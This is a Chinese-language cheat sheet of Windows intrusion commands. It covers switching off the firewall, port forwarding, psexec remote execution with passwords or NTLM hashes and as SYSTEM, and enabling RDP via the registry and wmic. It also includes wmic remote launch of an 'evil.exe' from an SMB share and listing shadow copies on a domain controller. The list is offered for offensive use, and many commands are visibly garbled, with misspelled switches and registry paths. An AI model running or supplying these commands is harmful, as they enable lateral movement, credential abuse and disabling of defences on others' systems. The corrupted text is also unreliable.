禁用windows防火墙
netsh advfirewall set currentprofile state off
netsh adbfirewall set all profiles state off

本机windows端口转发（必须是管理员权限）不需要借助第三方软件进行转发
启用转发
netsh interface port proxy add v4tov4 listenport=3000 listenaddress=192.168.1.100 connectport=4000 connectaddress=192.168.1.120
停止转发
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=192.168.1.100

psexec的一些用法

执行远程主机上上的文件或者命令
psexec /acceptula \targetip -u domain\user -p password -c -f \smbip \share\file.exe

＃注意，第一次执行psexec一定要带aaceptula参数，否则会弹出一个确认对话框，在命令行下是没办法结束的

利用用户hash来登录远程主机并执行命令
psexec /acceptula \ip -u Domain\user -p LM:NTLM cmd.exe /c dir c:\

以system权限来执行远程命令
psexec /accepteula \ip -s md.exe

修改注册表开启windows终端服务
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

wmi命令用法详解

使用用户名密码通过smb来执行远程主机上的命令或者文件
wmic /node: targetiP /user:domain\user /password:password process call create "\ smbiP \share\evil.exe”

卸载软件
wmic product get name /value # 获取软件名称
wmic product where name=11XXX" call uninstall /nointeractive

判定远程登录用户
wmic /node:remotecomputer computersystern get username

实时获取远程主机进程
wmic /node:machinename process list brief /every:1

开启远程rdp
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where
AllowTSConnections=''O'' call SetAllowTSConnections ''1’'

列举用户登录时长
wmic netlogin where (name like "%adm%") get numberoflogons

卷影拷贝服务
wmic /node: DC IP /user:"DOI1AIN\user" /password:"P ASS 11 process call create "cmd /c vssadmin list shadows 2 &1 c:\temp\output.txt”